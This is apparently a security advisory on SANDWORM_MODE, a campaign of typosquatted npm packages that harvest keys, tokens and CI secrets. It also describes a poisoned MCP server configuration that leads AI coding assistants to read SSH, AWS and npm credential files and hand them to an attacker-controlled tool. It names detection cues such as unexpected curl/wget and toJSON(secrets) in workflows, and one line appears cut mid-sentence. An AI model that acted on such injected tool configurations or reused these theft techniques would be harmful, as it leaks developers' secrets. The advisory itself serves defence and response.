TL;DR
- A cluster of typosquatted npm packages is harvesting crypto keys, API tokens, and CI/CD secrets — then propagating via stolen npm/GitHub identities.
- The campaign also targets AI coding assistants by injecting a malicious Model Context Protocol (MCP) server configuration designed to trick tools into leaking SSH/AWS/npm creds.
- If you build software: treat this as active compromise risk — remove the packages, rotate secrets, and audit CI/workflows and developer machines.
What Happened
Researchers reported an active supply-chain campaign (tracked as SANDWORM_MODE) using at least 19 malicious npm packages published under multiple aliases. The packages masquerade as legitimate developer utilities via typosquatting, run payloads at install/import time, and prioritize credential and crypto key theft.
A second stage — time-gated with ~48h+ jitter, but fast in CI — expands into deeper harvesting, propagation, and workflow poisoning.
~/.ssh/id_rsa, ~/.aws/credentials, ~/.npmrc, and .env — then handing that data to the attacker-controlled “tool.”
Why It Matters
Secrets Are the Blast Radius
This isn’t just “one dev box.” It’s tokens, CI variables, cloud credentials, and crypto material — everything that turns a local foothold into org-wide access.
CI Is an Amplification Layer
Weaponized GitHub Actions and workflow injection can exfiltrate secrets and backdoor repos at scale.
AI Tooling Becomes an Exfil Path
MCP-style integrations are powerful — and that makes them a high-leverage place to enforce policy and least privilege.
Time-Gated Payloads Evade Quick Scans
Delayed stage-2 execution means short-lived sandboxes may miss the worst behavior.
What to Do Now
Hunt & Remove
Search your org for the listed malicious packages (and close typos) in package.json, lockfiles, internal registries, and build logs.
Rotate and Revoke
npm tokens, GitHub PATs, CI secrets, cloud keys, SSH keys. Assume any exposed dev/CI secret is compromised.
Audit CI Workflows
Review .github/workflows/* for suspicious pull_request_target, toJSON(secrets), unexpected curl/wget, or new exfil steps.
Inspect Developer Endpoints
Check for persistence via git hooks and unusual global git config (e.g., init.templateDir).
Lock Down Egress
Where feasible, restrict build runners and dev environments to approved destinations. Alert on DNS tunneling patterns.
Add Dependency Controls
Enforce verified publishers, dependency allowlists, and automated SCA/SBOM checks. Block new/unknown packages by default for high-trust repos.
Constrain AI Tool Integrations
Treat MCP/tooling configs as sensitive. Require approval for new “tools,” pin tool servers, and prevent assistants from reading secrets by default.
Detect Unusual Token Use
Monitor for new GitHub API activity, repo modifications, package publishes, and odd auth patterns from dev/CI identities.
How This Maps to ABAC-Enabled Security
Policy-as-Code Authorization (ABAC)
Define explicit policies for who/what (developer workstation, CI runner, AI assistant) can access which secret classes (SSH keys, cloud creds, signing keys) and under what context (branch, repo, environment).
Data-Centric Controls
Treat secrets and credentials as high-value data. Apply classification + controls at the point of use (read, export, transmit), not just perimeter defenses.
Crypto Agility Mindset
Rotate keys/tokens quickly, prefer short-lived credentials, and automate key lifecycle so “rotate everything” is operationally survivable when supply-chain events hit.
Sources
- The Hacker News, “Malicious npm Packages Harvest Crypto” (February 2026)
- Socket Research, “SANDWORM_MODE: npm Worm & AI Toolchain Poisoning” (2026)